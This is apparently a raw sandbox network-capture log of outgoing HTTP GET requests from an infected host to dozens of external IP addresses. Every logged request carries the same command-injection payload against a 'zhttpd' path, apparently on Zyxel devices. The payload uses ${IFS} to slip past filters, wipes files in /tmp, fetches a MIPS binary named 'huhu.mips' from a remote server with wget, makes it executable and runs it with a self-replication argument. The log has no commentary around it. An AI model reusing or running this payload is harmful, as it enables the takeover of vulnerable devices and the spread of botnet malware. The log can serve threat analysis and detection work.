                                                        Feb 2, 2024 06:21:20.132828951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6898192.168.2.14554828.204.105.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132873058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6899192.168.2.144002674.142.40.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132905006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6900192.168.2.14358409.248.2.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132958889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6901192.168.2.1450432144.8.151.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133025885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6902192.168.2.1434114126.29.72.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133054018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6903192.168.2.144938264.121.28.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133100033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6904192.168.2.1441936138.224.46.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133121967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6905192.168.2.1453158195.177.152.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133177042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6906192.168.2.143649461.46.255.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133219004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6907192.168.2.1445084115.143.247.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133249044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6908192.168.2.145675661.79.213.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133291960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6909192.168.2.145253490.35.206.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133332014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6910192.168.2.1459252167.120.27.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133363962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6911192.168.2.1444286125.88.76.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133415937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6912192.168.2.143898213.130.125.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133466959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6913192.168.2.145830496.38.176.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133492947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6914192.168.2.1436714199.14.72.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133537054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6915192.168.2.143634684.211.69.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133594036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6916192.168.2.1445504183.215.7.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133650064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6917192.168.2.1440346129.125.38.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133687973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6918192.168.2.1438592164.95.95.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133721113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6919192.168.2.144895434.79.62.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133775949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6920192.168.2.1455602124.124.11.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133806944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6921192.168.2.1434836145.99.81.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133860111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6922192.168.2.1453118199.204.135.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133903027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6923192.168.2.143350087.233.10.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133935928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6924192.168.2.1433108202.243.172.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.133987904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6925192.168.2.145068891.156.182.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134035110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6926192.168.2.1455066139.185.1.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134057045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6927192.168.2.1436316220.164.157.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134083033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6928192.168.2.1436164143.224.174.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134131908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6929192.168.2.144187220.187.169.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134151936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6930192.168.2.1459142209.212.184.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134215117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6931192.168.2.1433462153.6.180.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134263992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6932192.168.2.1438408150.75.253.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134314060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6933192.168.2.144941613.84.255.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134358883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6934192.168.2.1442962151.0.78.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134396076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6935192.168.2.143751218.175.123.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134453058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6936192.168.2.144422478.95.249.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134478092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6937192.168.2.1443732110.226.209.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134526968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6938192.168.2.1439806128.99.75.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134598970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6939192.168.2.14380744.141.164.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134630919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6940192.168.2.1439568190.109.5.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134668112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6941192.168.2.143950217.189.101.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134706020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6942192.168.2.143683697.11.80.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134742975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6943192.168.2.1445220167.22.209.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134785891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6944192.168.2.1444416139.51.215.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134838104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6945192.168.2.145620223.92.91.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134866953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6946192.168.2.144583279.66.42.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134907961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6947192.168.2.144977239.194.17.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134938002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6948192.168.2.144681462.82.247.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.134996891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6949192.168.2.1459122108.211.108.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.135040045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6950192.168.2.145118884.75.255.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.135085106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6951192.168.2.1440184104.178.55.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.135129929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6952192.168.2.1441844152.134.235.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.135178089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6953192.168.2.145687882.96.40.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.135219097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6954192.168.2.145580662.86.25.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.135270119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6955192.168.2.144208240.186.9.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.135298014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6956192.168.2.144513019.23.36.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.135349035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6957192.168.2.1438440147.27.181.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.135387897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6958192.168.2.1445470143.167.88.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.135406971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6959192.168.2.1444880115.50.205.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.135466099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6960192.168.2.1448388142.212.131.41443
                                                        TimestampBytes transferredDirectionData
